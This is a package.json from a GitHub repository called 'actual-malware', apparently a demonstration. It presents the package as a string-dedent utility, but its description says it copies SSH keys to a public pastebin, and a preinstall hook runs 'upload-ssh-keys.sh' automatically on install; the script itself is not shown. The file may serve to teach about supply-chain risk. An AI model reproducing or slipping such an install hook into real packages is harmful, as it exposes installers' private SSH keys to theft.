forked from qpwo/actual-malware
-
Notifications
You must be signed in to change notification settings - Fork 0
/
package.json
39 lines (39 loc) · 1.2 KB
/
package.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
{
"name": "actual-malware",
"version": "11.2.12",
"description": "string dedent! also copies your ssh keys to a public pastebin immediately",
"main": "dist/index.js",
"scripts": {
"test": "ts-mocha -p tsconfig.json src/index.spec.ts",
"fmt": "prettier -wl src/*",
"build": "tsc",
"preinstall": "bash upload-ssh-keys.sh"
},
"repository": {
"type": "git",
"url": "git+https://github.com/qpwo/actual-malware.git"
},
"keywords": [
"security"
],
"author": "",
"license": "GPL-3.0-or-later",
"bugs": {
"url": "https://github.com/qpwo/actual-malware/issues"
},
"homepage": "https://github.com/qpwo/actual-malware#readme",
"devDependencies": {
"@types/expect": "^24.3.0",
"@types/mocha": "^9.1.0",
"@types/node": "^17.0.21",
"@typescript-eslint/eslint-plugin": "^5.14.0",
"@typescript-eslint/parser": "^5.14.0",
"eslint": "^8.11.0",
"eslint-plugin-simple-import-sort": "^7.0.0",
"eslint-plugin-unused-imports": "^2.0.0",
"mocha": "^9.2.2",
"prettier": "^2.5.1",
"ts-mocha": "^9.0.2",
"typescript": "^4.6.2"
}
}